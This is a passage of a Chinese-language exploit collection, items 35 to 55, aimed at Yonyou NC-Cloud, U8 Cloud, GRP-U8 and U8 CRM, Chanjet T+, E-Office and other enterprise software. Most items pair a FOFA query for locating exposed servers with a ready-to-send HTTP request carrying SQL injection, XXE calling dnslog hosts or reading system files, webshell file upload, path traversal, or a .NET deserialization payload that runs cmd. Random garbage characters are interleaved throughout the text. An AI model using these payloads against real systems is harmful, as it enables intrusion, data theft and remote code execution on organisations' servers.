GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ [, z( G8 j* Z, xHost: your-ip& c6 p0 ?: I+ _) {+ u2 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 e7 p' I  D% e" V$ n" T. ^Content-Type: application/x-www-form-urlencoded
* ?- m: y* n- ~# LAccept-Encoding: gzip, deflate
3 P/ l' K4 b1 u$ K* |Accept: */*
8 U$ ]7 v+ {) f' HConnection: keep-alive
* o2 ~9 o* R, o! ]0 x
* h) m* M! z3 R6 O  w
4 b* J6 ]% C2 G35. 用友NC-Cloud importhttpscer任意文件上传! M$ D9 A) D; [
FOFA:app="用友-NC-Cloud"" D* \, ?7 N6 U: l- G$ p+ ]
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1# E( f$ s+ D% s( z+ {! Y
Host: 203.25.218.166:8888
9 h3 C) k' g( b, m) g- Y- W$ ~3 E2 _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! G: m% i+ y( K6 g
Accept-Encoding: gzip, deflate9 b6 {  e3 L/ A" R
Accept: */*
5 ?; \$ g% p& g9 B2 cConnection: close
7 q6 A; ^/ H$ M# R( TaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
' P5 z+ H2 ^0 R/ y% tContent-Length: 190. `9 W: d8 }' ~8 Z8 Q
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0- O+ A$ ]$ @5 W+ ]
7 R, ?; L1 `  p1 t6 y" q) R) ]
--fd28cb44e829ed1c197ec3bc71748df0, h. X! G9 p- j. }" u* G
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"- W4 ^+ e( O2 _+ n$ y! j: S6 l  h/ _

- d6 R  i0 o4 t4 q<%out.println(1111*1111);%># P0 C! T4 z- y$ ^7 g
--fd28cb44e829ed1c197ec3bc71748df0--0 E9 {5 {. ~  g0 z' Q$ M
( |$ ]8 e! V$ S; _3 S6 q7 S/ g

9 P! h. |0 F5 S  V* @& \$ c/ a36. 用友NC-Cloud soapFormat XXE7 U, a/ Q9 F+ q8 B+ Z) W
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/". x* Z* n+ z* q3 `8 J0 {' L. E
POST /uapws/soapFormat.ajax HTTP/1.12 q, D$ a2 f& J2 H* J9 T/ n
Host: 192.168.40.130:89890 Q3 b& n" |) t3 M5 b- J- L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
5 i% J; n) l7 n+ GContent-Length: 263
5 g6 a% n. X! H; m0 a. I0 F" ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 [; X; U# r5 t# B
Accept-Encoding: gzip, deflate$ [: {0 _5 o6 M) E! r) D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  i! x* k7 Q, B1 @9 G# j
Connection: close8 p: n. L# a" m( ?
Content-Type: application/x-www-form-urlencoded
: J( N8 Y8 G; i0 A6 Q% p1 V: r& HUpgrade-Insecure-Requests: 19 D# [- F7 L' [+ l! G# n" Z

0 k# B. |" ]2 A" }) Z! V6 b8 Z: k5 gmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a4 e6 }2 W7 E0 T0 {' ~

- r  j! p8 H0 ?. X
7 f8 N( ?3 J( I, y7 m9 n37. 用友NC-Cloud IUpdateService XXE* r% b3 e" j2 X/ L
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* m# X; }/ H, j/ |
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
* @0 d0 w& G2 QHost: 192.168.40.130:8989
1 C6 ?7 |0 @0 K8 J% u% L2 c- KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
% i* H! T& n+ D5 l2 Z% IContent-Length: 421; U8 R9 D0 P5 [: g  ?! R! d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) W7 k# Q8 o* G% y6 TAccept-Encoding: gzip, deflate
6 d, N0 P" }6 _' h8 c9 v. aAccept-Language: zh-CN,zh;q=0.9
! G8 C8 M3 B, H; c7 UConnection: close
# G: A! T; J* f, s$ |Content-Type: text/xml;charset=UTF-8
9 D3 X4 E; r' i& B3 OSOAPAction: urn:getResult2 `  a4 ^/ ^  L" v& d7 e+ n! a
Upgrade-Insecure-Requests: 1  A8 h" k! |3 j. O2 R9 ?

* y) i2 N; d# Q<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">3 B& _+ h8 ]2 s3 I; c
<soapenv:Header/>' P' n$ m" O. y; q; x8 E2 [7 }
<soapenv:Body>
9 U: C3 H0 j" W/ r+ E  \<iup:getResult>
2 i5 J, g9 [( D<!--type: string-->
/ X& d0 ?7 ?5 o6 _2 |. m+ z<iup:string><![CDATA[
7 t0 D* r/ Z& u; q6 c<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>$ v- p& ~% i% I3 K0 Q1 H
<xxx/>]]></iup:string>6 n8 w. e: r( E9 _
</iup:getResult>7 t  V* W8 p: N% _( V& t: M
</soapenv:Body>
4 G% ^( r4 e8 R* A- T( _/ t</soapenv:Envelope>5 |4 S5 V+ Q5 }, P# ?
7 Y8 A4 c* T( ~' m" j
/ U9 w" r; r4 X( ~
5 \- L  ]+ Q4 |9 u- B
38. 用友U8 Cloud smartweb2.RPC.d XXE
9 n, S7 r: A" v' k$ SFOFA:app="用友-U8-Cloud"
/ f+ m/ F. v; m8 Y8 W( v) \$ s* h0 k3 UPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% X: Q3 y/ G! d0 x: u
Host: 192.168.40.131:8088! `  q3 |6 ~2 }! c5 j* C% t( E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25) M+ s6 @4 s. L# I9 ~& c
Content-Length: 260- l9 ?) A( Y( K$ @3 R: R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3/ d, |" @7 K/ _0 t" h) P. \
Accept-Encoding: gzip, deflate- V9 c, n' q9 r; _2 O/ E5 L* b
Accept-Language: zh-CN,zh;q=0.9
% j6 l' D. I$ i9 y% l% hConnection: close+ R9 E3 [, w9 W9 M2 Z1 r% @( m3 m7 U
Content-Type: application/x-www-form-urlencoded
( a8 U! M/ x* ?# O$ e* @
8 i2 V( B% [0 G7 c& W  ]4 [__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
$ a7 g' K  r- u% [# e& Z+ D* v2 d3 H) O

4 }; Y8 t/ N) _0 T5 j) X  n39. 用友U8 Cloud RegisterServlet SQL注入
" F/ r* o- j5 g4 F  R5 X4 \9 vFOFA:title="u8c"
9 ^$ ~3 S8 ?+ U5 I8 @# x- lPOST /servlet/RegisterServlet HTTP/1.1
! k' y- b1 V2 A5 I: u0 L  ?Host: 192.168.86.128:8089
: F: b! r& q; z  V$ ?; wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
* S+ v1 R; w( U, [Connection: close
: A' A2 {/ y% Q) |Content-Length: 85$ I+ [, T* Y" m" J4 h' Z
Accept: */*
9 r- _/ |. U7 V( M7 I* w  r* hAccept-Language: en+ X' \% f$ T" G, O" _4 \6 e7 W# B) h% X
Content-Type: application/x-www-form-urlencoded# E" R# V8 q% f/ d# v, J% {
X-Forwarded-For: 127.0.0.1
) n; g# e: D/ ]2 x; B% mAccept-Encoding: gzip
8 H0 H9 f- a! e. ^
& g0 T3 x+ y6 Musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--0 k! ^4 r9 m7 h# [
# \" b* z' G. @
5 G) @- S. n+ Z4 H& Q
40. 用友U8-Cloud XChangeServlet XXE
3 e' x" d  v4 \FOFA:app="用友-U8-Cloud"
$ [; |; a8 j: E6 u8 g) xPOST /service/XChangeServlet HTTP/1.1
5 C/ v5 {& J, d1 B, NHost: x.x.x.x% a, x: R' Q( d4 ^9 ^0 J
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 S$ P# M8 I" Y2 c* v$ U& AContent-Type: text/xml
: |, t6 v* L/ bConnection: close# i- G1 ]9 X/ L8 Y9 W+ z+ ~

5 a. _, [2 g- d( F. _# E<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
2 P2 X4 {3 y! F* ~0 j" q2 M
; l5 U% ^) p9 C. h* \. B& L' R
& D4 Y5 V5 q5 N* P* }* v; @% h41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% {) x# g. s% N6 RFOFA:app="用友-U8-Cloud"0 Z! s" R3 x( ?7 u. J0 [3 b
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
% ^2 b( v: w- p( i/ |Host:- w3 Z1 l2 d7 C0 _6 o0 t  g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( ?% U& i6 a* MContent-Type: application/json
; k# o) t5 b+ s0 CAccept-Encoding: gzip
. c" L; M$ y7 ?0 T) g" QConnection: close7 g: q  a6 S% ?: i0 S' M& v

' p) I' @9 T5 `6 f% Y  N1 L* d
9 l4 C" I/ s0 m0 {7 G42. 用友GRP-U8 SmartUpload01 文件上传, N1 }3 H' G; f  E; w
FOFA:app="用友-GRP-U8"
; j9 D) T3 d% o6 \POST /u8qx/SmartUpload01.jsp HTTP/1.1' W1 y# `. H: l$ a/ j: h
Host: x.x.x.x
  Y6 H) U/ E% J6 `$ L. uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt1 W$ v; W  J/ c; I/ O) w5 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36- _& O  @( z# e! `% h2 V% O9 `. G4 b
* l0 O% O" f$ `3 Q, A
PAYLOAD4 z+ L1 I) r$ P
3 v2 @4 T8 b  Q8 w+ N

* l3 x2 y# W: A9 }http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
2 W& V3 Q0 T1 P1 \6 q/ P
6 w4 b7 G; G6 W% U: ?8 _43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 v* I7 W  @% K0 Q! D+ ]FOFA:app="用友-GRP-U8"! m; t1 J' a) Y
POST /services/userInfoWeb HTTP/1.1
7 [  J6 Q+ q  THost: your-ip9 ^4 @' ]- M3 ^7 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- E" o) h4 B: {* r& D+ ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  J. \. k: r8 y7 O
Accept-Encoding: gzip, deflate# J; e5 g. {) \9 Y* z5 o$ u
Accept-Language: zh-CN,zh;q=0.9
' z" E, R9 S! w1 a, R- Z# A9 Q$ y) UConnection: close* ?' S" m: _& l. v
SOAPAction:; `  [* x' ~* K" Q' v& ~; S
Content-Type: text/xml;charset=UTF-8* |% B4 |" t* c3 z& [5 G  G

7 I5 g- G/ a5 j/ [& B$ z7 V  F<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
+ c9 A, T9 E0 L5 [. r1 O0 G  ~   <soapenv:Header/>- h1 `# X7 G8 P' Q8 V; _
   <soapenv:Body>
7 V9 |$ X8 m+ \) p. C$ H! D      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
3 J  X6 E6 ], G" [         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>3 t  [! r6 t6 r$ `8 f4 Q9 k5 v
      </ser:getUserNameById>' k* p, e" r8 b0 p  V: l* Q
   </soapenv:Body>
" G# E+ i% ?: W* l</soapenv:Envelope>; j  h4 l7 z  q) y- n4 c  Z1 ?1 Q5 b2 v
/ b4 b" l; j( o5 n3 [  O9 h; _

; R1 w1 x  n1 R- z44. 用友GRP-U8 bx_dj_check.jsp SQL注入# k' a$ r8 x. I
FOFA:app="用友-GRP-U8"
* m0 i6 N/ j  K" d2 r/ R! ?0 YGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1! h4 |# C% q. M( R9 ^' r
Host: your-ip& c5 c, q% H1 z& [* f$ g- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
, L2 M+ W% a/ `  g! JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 f# r6 m; j$ I, |  R6 J# Q
Accept-Encoding: gzip, deflate
. b, G$ E( y# {0 ^1 a+ e" s, EAccept-Language: zh-CN,zh;q=0.9
# {5 D8 i+ b7 c& hConnection: close* e. E) w1 g, B  {7 Y1 z
( e# e$ N2 R% k/ h
8 b6 x( [( ]' a5 T) X; [
45. 用友GRP-U8 ufgovbank XXE
* N" z4 z& i/ n9 R" f5 B2 ]0 RFOFA:app="用友-GRP-U8"% Y% ]4 Q0 u3 `
POST /ufgovbank HTTP/1.1
) Z$ f0 z2 j3 r4 F1 hHost: 192.168.40.130:222
6 R# }" T! J% f! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+ f: u/ T: t! cConnection: close
, {* a2 L. I3 Y8 C0 f8 XContent-Length: 1619 w$ b$ t. [8 k( j  V1 b: R; d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 v( X* j% Y% ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 v# _) v* E* }+ G& _Content-Type: application/x-www-form-urlencoded3 _& n/ b' g: h# Z: ]
Accept-Encoding: gzip
8 F1 T0 r' K% q( B$ Q, L7 |# o: P5 V6 t( V! U- b
reqData=<?xml version="1.0"?># b8 f# N. f- b$ _# w
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
; b; U. h* z! H9 W  E4 j
! i9 N+ n; Q# {
9 k6 R& y$ s, ^3 {/ D8 x; ?46. 用友GRP-U8 sqcxIndex.jsp SQL注入" u; q! P0 p) F: G& T
FOFA:app="用友-GRP-U8"
. @3 R. I* f1 `; H2 o2 ZGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
1 F: H6 ~% e% `- LHost: your-ip
1 c* Y6 \7 y8 T: t2 Y5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+ t0 @( b! l- Y8 `: n) e  KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 ~7 `9 A9 v' z( ~9 k
Accept-Encoding: gzip, deflate
, L$ w( D5 @$ e+ @1 H; pAccept-Language: zh-CN,zh;q=0.9
% J6 t. A* n3 T" b0 WConnection: close) S. }3 n  A% X. F2 I
6 p- V% [3 e5 @8 b6 R2 p! {
( I7 K9 j! q; D5 g, T
47. 用友GRP A++Cloud 政府财务云 任意文件读取  z: Y( B+ G4 n% {& Y1 F+ b3 ?
FOFA:body="/pf/portal/login/css/fonts/style.css"
- Y$ }6 I4 M" _% e: t6 UGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1- `; t" X# y' W. s" K6 @2 ^
Host: x.x.x.x
" s2 z) J7 D, c2 eCache-Control: max-age=0
" e  R; |1 u4 u8 c! B/ x: mUpgrade-Insecure-Requests: 1( p8 O; w. S' D: g  b9 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 P5 x6 X6 m) W+ y/ K6 j4 i) B- l: }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" D/ I9 r2 s! ^Accept-Encoding: gzip, deflate, br
) |% g) R. H( t6 W$ Y$ v0 \9 GAccept-Language: zh-CN,zh;q=0.9; x* ~& v5 c; U& X# R
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
2 \( S& P2 ?& s& IConnection: close
4 W" K  ^. a) `. O* o0 B; d
/ D" x1 @% F0 `0 c0 e! W) `0 }/ K' H& n: p6 F

( b6 M( Q3 T/ u0 m5 a; Q9 J8 D48. 用友U8 CRM swfupload 任意文件上传, E2 z/ w+ s1 k  V$ R" A) D
FOFA:title="用友U8CRM") b7 q0 B/ e; b7 l3 \
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
/ @9 s) c1 ~1 K. a0 `* JHost: your-ip
+ S" m' M) f/ M  c" g) }1 `& C1 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 p( t8 |* n+ F( BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 ]* Y$ w7 ~* e7 C- f) g8 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 U5 _$ f; _6 j+ S2 v+ b0 p  h' ~( sAccept-Encoding: gzip, deflate
- e- O/ N8 B/ l! h' mContent-Type: multipart/form-data;boundary=----2695209672394068716424300668553 f* j$ c# X3 X! q' g
------269520967239406871642430066855  X3 _$ K! c; G% p
Content-Disposition: form-data; name="file"; filename="s.php"
2 ~. D: A6 s# k5 b0 t1231* x0 P; V9 G& w
Content-Type: application/octet-stream
9 B$ i9 S( x6 g! U' u: J: {------2695209672394068716424300668552 O3 G9 A  M# j
Content-Disposition: form-data; name="upload"
' L9 C$ R4 c% }/ E# Iupload
; }8 q) p6 l' h# \& w------269520967239406871642430066855--; Z0 V7 w0 S3 t& o6 U

& U, m( a2 X8 C) E, u& D" @* a& B6 k. l! m
49. 用友U8 CRM系统uploadfile.php接口任意文件上传# l7 e* s) d, v, w$ Y) s/ r
FOFA:body="用友U8CRM"
) [+ q6 ~  e# {; a  w1 v9 Y
6 R# M# v- E  V. hPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
' o2 M2 U9 Z8 t3 `% f% Z: C0 X& DHost: x.x.x.x/ G4 A) P% v. c: b" `( _3 t$ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ c4 J0 y' U+ e+ `# ^& X# x/ OContent-Length: 329+ j# x- c1 I$ m% y: r1 u) C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% X$ Q$ [$ E( g  ?1 H8 @( a# k" lAccept-Encoding: gzip, deflate
$ ]3 o$ S  g& W. Q3 t& j# l7 [; BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 N" {6 Z+ z) ~1 lConnection: close" |! i( E+ x0 o+ D7 W
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
. s/ ^# q) a; W9 N$ ?1 Q
" A( ^# `+ E$ l  t* M-----------------------------vvv3wdayqv3yppdxvn3w
9 f) y7 D+ R! PContent-Disposition: form-data; name="file"; filename="%s.php "
: d4 h0 [3 I& E, QContent-Type: application/octet-stream9 u4 b6 d( J' @3 S" n. l; k

6 ^! S/ e) X0 O) jwersqqmlumloqa$ c% C) V' `6 M' K9 q- Q
-----------------------------vvv3wdayqv3yppdxvn3w
) c' x8 J3 j1 l3 i; k! ?Content-Disposition: form-data; name="upload"& M% U4 `) z3 c( F

* Z# r; Y0 L- ?* a2 _8 W' |( Mupload/ L3 w4 N# W2 S  K, g
-----------------------------vvv3wdayqv3yppdxvn3w--
9 `2 Y) r9 Q. |' A5 O9 k; k& f8 r' @- |( D  E+ M
2 @6 i3 P. o6 \2 q  ^
http://x.x.x.x/tmpfile/updB3CB.tmp.php3 W0 @5 T/ J7 F$ O) ?
6 ^7 ?& ^+ Y5 V4 [; ^* a7 K
50. QDocs Smart School 6.4.1 filterRecords SQL注入
/ Q) `. g8 o" b# {* rFOFA:body="close closebtnmodal"+ F1 ~: p% S( K2 F: Y- l* `
POST /course/filterRecords/ HTTP/1.1
( l. c  K2 s. ~  J8 S( m7 K( B& UHost: x.x.x.x- k' G" d8 d8 M4 k, S
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! H' R2 j+ T  Y5 A% z! G
Connection: close
9 l8 e% G( N1 O# k5 t9 ?Content-Length: 224! \) t4 K1 G' |9 j
Accept: */** p0 L5 ^8 x$ ^0 L
Accept-Language: en
# G4 X  G% |1 L# s' s9 OContent-Type: application/x-www-form-urlencoded
3 b0 ~4 w( I7 g1 X/ M6 B8 |Accept-Encoding: gzip; }; W# Y8 s: {9 O0 L5 \8 t# e
% l9 `# i8 D2 l8 {
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1" h( Y1 R) X: d  O! F

. i- ~0 c) Q8 V+ H' f9 ~# A2 z% _: q/ ?4 b8 R
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
# y( f) N* l' C5 H! u1 S  c9 F" i. BFOFA:app="云时空社会化商业ERP系统"
" H" H. }% ]9 ~. oGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.14 d2 F, k! |. N* }
Host: your-ip4 h/ i; m  y0 [4 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36' `# @1 a1 Q! G8 t9 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: F2 r) p6 {( w' j; c" s5 e
Accept-Encoding: gzip, deflate' w2 f7 u8 v3 @4 H, ~9 l
Accept-Language: zh-CN,zh;q=0.92 \: x: g& h  v8 ]& F
Connection: close
& Z  m! h. Y9 Y2 M- o8 t- X$ m# U. ?9 k- Z% D2 c9 S: N
0 C4 }& `' W3 Q! m  D
52. 泛微E-Office json_common.php sql注入
1 T; M* \' u" f. c0 ?FOFA:app="泛微-EOffice"# y- n  Y  z, F$ x( a
POST /building/json_common.php HTTP/1.1
) n, }( _; c- i4 R* \  O" c, SHost: 192.168.86.128:8097
$ F5 e0 e0 E) zUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' ^/ W: F' \" k. t1 U& jConnection: close
9 A# T2 h5 D; W  {& fContent-Length: 87
/ O+ `8 T: Z! y7 |* VAccept: */*
7 T! V8 R+ ~% L, w7 {; r  \$ G1 HAccept-Language: en; u. m, t3 h1 c: z! O6 O: y
Content-Type: application/x-www-form-urlencoded+ J: g' Q: {" L
Accept-Encoding: gzip
0 J' k# `4 J% V5 N* z
' Y3 S3 i0 m! c! htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
7 R9 O4 M- m4 w2 c6 B2 {9 O: F& a5 W; M# Q6 M( h1 {

/ U+ m8 y4 P4 S& Z. ?2 h7 z53. 迪普 DPTech VPN Service 任意文件上传% }* G" A5 S5 O) P3 g
FOFA:app="DPtech-SSLVPN"# S5 {( b0 ?0 d% u, z* h
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6 l9 o; L% m6 C3 r0 n6 F8 w: X# B
3 F" O9 L+ k" D$ `/ q8 C$ X1 `* |* I; A! H0 O" E6 u  ~, S. ?9 N
54. 畅捷通T+ getstorewarehousebystore 远程代码执行7 c% W% _  ]6 `) G1 n& _# S
FOFA:app="畅捷通-TPlus"2 n6 W0 n* f/ @/ V( P% e* ?1 ]; |
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
5 B3 R9 p! g7 X- D! J4 d- B7 }  B. Q6 l7 L"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
" y; t  b' n# Z7 Z' f& [+ S! F$ u$ c" w; e. x9 J& r! I
, i; c8 H$ z- n6 J
完整数据包' ]" s: T- w$ z% S
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
2 e6 V2 `' c6 e4 x! r9 gHost: x.x.x.x- k3 u8 T9 ]) t* `
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" M$ [# I" D$ R/ G
Content-Length: 5939 B5 l& }  b$ f$ D# ~$ |
4 T* Q$ A" I  f6 g+ a
{
* l: z4 T0 g/ ~& j1 N"storeID":{; P( O" q; d9 d5 D
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
) S( z* e1 H  ~4 M "MethodName":"Start",. [3 x/ V5 t' O4 m. t. U
  "ObjectInstance":{& p, \. h; [& y6 b- ~+ O
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! T* |6 q+ [/ B" u: K    "StartInfo":{
$ P/ B; S2 ?0 ?6 J4 F- c: W5 O# P   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, N" ^7 c" B! [/ T% l! B2 {
    "FileName":"cmd",# @, d& [  O" C  Y
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
7 R4 g& x: ~& A/ V4 e) [    }
4 m. `5 n9 l# J* x  }5 y( ~7 Y4 Q  @1 {
  }" }5 B1 \( |3 X' f( _, R1 @2 B
}
+ |& T" S8 ]; I) l. h6 Z4 l
- {1 Z; q/ U4 O' {$ n( A. ~9 k. h( t; V/ m
第二步,访问如下url4 H0 @' H8 K9 a
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt) y3 a4 k" b' A# ]. p) x* m9 U
5 U% @7 c$ ?; j6 C
, }: A6 H2 A0 n5 {6 T' X  |
55. 畅捷通T+ getdecallusers信息泄露
. o. K: O( u/ QFOFA:app="畅捷通-TPlus"1 z  D: q  _& U+ a2 \6 }' X# R  v
